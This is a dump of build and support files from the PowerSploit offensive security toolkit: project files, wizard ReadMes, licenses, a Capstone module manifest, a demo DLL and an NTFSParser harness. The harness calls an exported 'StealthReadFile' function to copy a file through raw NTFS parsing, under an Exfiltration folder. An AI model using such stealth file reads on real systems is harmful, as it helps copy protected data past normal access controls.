-------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32 16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64 17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64 18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32 19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32 20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64 21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = 
preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32 16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64 17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64 18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32 19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32 20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64 21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 
| 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source 
Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | PowerSploit is provided under the 3-clause BSD license below. 2 | 3 | ************************************************************* 4 | 5 | Copyright (c) 2012, Matthew Graeber 6 | All rights reserved. 
7 | 8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 9 | 10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
15 | 16 | 17 | -------------------------------------------------------------------------------- /ReverseEngineering/ProcessModuleTrace.format.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessModuleTraceView 6 | 7 | LOADED_MODULE 8 | 9 | 10 | 11 | 12 | 13 | 14 | TimeCreated 15 | 16 | 17 | ProcessId 18 | 19 | 20 | FileName 21 | 22 | 23 | 24 | "0x$($_.ImageBase.ToString("X$([IntPtr]::Size * 2)"))" 25 | 26 | 27 | ImageSize 28 | 0x{0:X8} 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /Capstone/Capstone.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'Capstone.psm1' 5 | 6 | # Version number of this module. 
7 | ModuleVersion = '2.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'bc335667-02fd-46c4-a3d9-0a5113c9c03b' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'see LICENSE.TXT' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'Capstone Disassembly Framework Binding Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '3.0' 23 | 24 | # Minimum version of the common language runtime (CLR) required by this module 25 | CLRVersion = '4.0' 26 | 27 | # Assemblies that must be loaded prior to importing this module 28 | RequiredAssemblies = 'lib/capstone.dll' 29 | 30 | # Format files (.ps1xml) to be loaded when importing this module 31 | FormatsToProcess = 'Get-CSDisassembly.format.ps1xml' 32 | 33 | # Functions to export from this module 34 | FunctionsToExport = '*' 35 | 36 | # List of all modules packaged with this module. 
37 | ModuleList = @(@{ModuleName = 'Capstone'; ModuleVersion = '1.0.0.0'; GUID = 'bc335667-02fd-46c4-a3d9-0a5113c9c03b'}) 38 | 39 | # List of all files packaged with this module 40 | FileList = 'Capstone.psm1', 41 | 'Capstone.psd1', 42 | 'Get-CSDisassembly.format.ps1xml', 43 | 'LICENSE.TXT', 44 | 'README', 45 | 'lib/capstone.dll', 46 | 'lib/x86/libcapstone.dll', 47 | 'lib/x64/libcapstone.dll' 48 | } 49 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | -------------------------------------------------------------------------------- /Capstone/LICENSE.TXT: -------------------------------------------------------------------------------- 1 | This is the software license for Capstone disassembly framework. 2 | Capstone has been designed & implemented by Nguyen Anh Quynh 3 | See http://www.capstone-engine.org for further information. 4 | 5 | Copyright (c) 2013, COSEINC. 6 | All rights reserved. 7 | 8 | Redistribution and use in source and binary forms, with or without 9 | modification, are permitted provided that the following conditions are met: 10 | 11 | * Redistributions of source code must retain the above copyright notice, 12 | this list of conditions and the following disclaimer. 
13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | * Neither the name of the developer(s) nor the names of its 17 | contributors may be used to endorse or promote products derived from this 18 | software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 23 | ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 24 | LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 25 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 26 | SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 27 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 28 | CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 29 | ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 30 | POSSIBILITY OF SUCH DAMAGE. 
31 | -------------------------------------------------------------------------------- /Capstone/Get-CSDisassembly.format.ps1xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | InstructionView 6 | 7 | Capstone.Instruction 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | Address 27 | 0x{0:X8} 28 | 29 | 30 | Mnemonic 31 | 32 | 33 | Operands 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 
14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | #include "stdafx.h" 19 | #include "NTFS.h" 20 | #include "NTFS_Attribute.h" 21 | #include "NTFS_Common.h" 22 | #include "NTFS_DataType.h" 23 | #include "NTFS_FileRecord.h" 24 | 25 | using namespace std; 26 | 27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*); 28 | 29 | int _tmain(int argc, _TCHAR* argv[]) 30 | { 31 | HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll"); 32 | HANDLE procAddress = GetProcAddress(parserDLLHandle, "StealthReadFile"); 33 | 34 | StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress; 35 | 36 | DWORD buffSize = 1024*1024; 37 | BYTE* buffer = new BYTE[buffSize]; 38 | DWORD bytesRead = 0; 39 | ULONGLONG bytesLeft = 0; 40 | DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft); 41 | 42 | cout << "Return value: " << ret << endl; 43 | 44 | ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary); 45 | myFile.write((char*)buffer, bytesRead); 46 | 47 | return 0; 48 | } 49 | 50 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoDLL DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoDLL application. 9 | 10 | 11 | DemoDLL.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 
13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoDLL.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoDLL.cpp 25 | This is the main DLL source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : LogonUser Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this LogonUser application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your LogonUser application. 
9 | 10 | 11 | LogonUser.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | LogonUser.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | LogonUser.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named LogonUser.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : NTFSParser Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this NTFSParser application for you. 
6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your NTFSParser application. 9 | 10 | 11 | NTFSParser.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | NTFSParser.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | NTFSParser.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp: -------------------------------------------------------------------------------- 1 | // DemoDLL.cpp : Defines the exported functions for the DLL application. 
2 | // 3 | 4 | #include "stdafx.h" 5 | #include "DemoDLL.h" 6 | 7 | using namespace std; 8 | 9 | 10 | extern "C" __declspec( dllexport ) char* StringFunc() 11 | { 12 | ostream *outputStream = NULL; 13 | 14 | //If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout. 15 | //outputStream = &cout; 16 | 17 | ostringstream *stringStream = new ostringstream(); 18 | outputStream = stringStream; 19 | 20 | (*outputStream) << "String DLL function is working" << endl << endl; 21 | 22 | string output = (*stringStream).str(); 23 | const char* outputStr = output.c_str(); 24 | 25 | char* out = new char[output.size()+1]; 26 | strcpy(out, outputStr); 27 | out[output.size()] = '\0'; 28 | 29 | 30 | return out; 31 | } 32 | 33 | extern "C" __declspec( dllexport ) void VoidFunc() 34 | { 35 | printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n"); 36 | return; 37 | } 38 | 39 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc() 40 | { 41 | wostream *outputStream = NULL; 42 | 43 | //If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout. 
44 | outputStream = &wcout; 45 | 46 | wostringstream *stringStream = new wostringstream(); 47 | outputStream = stringStream; 48 | 49 | (*outputStream) << L"WString DLL function is working" << endl << endl; 50 | 51 | wstring output = (*stringStream).str(); 52 | const wchar_t* outputStr = output.c_str(); 53 | 54 | wchar_t* out = new wchar_t[output.size()+1]; 55 | wcscpy(out, outputStr); 56 | out[output.size()] = '\0'; 57 | 58 | 59 | return out; 60 | } -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : DemoExe_MD Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoExe_MD application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoExe_MD application. 9 | 10 | 11 | DemoExe_MD.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoExe_MD.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoExe_MD.cpp 25 | This is the main application source file. 
26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoExe_MDd application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoExe_MDd application. 9 | 10 | 11 | DemoExe_MDd.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoExe_MDd.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. 
".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoExe_MDd.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this ExeToInjectInTo application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your ExeToInjectInTo application. 9 | 10 | 11 | ExeToInjectInTo.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | ExeToInjectInTo.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. 
This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | ExeToInjectInTo.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters: -------------------------------------------------------------------------------- 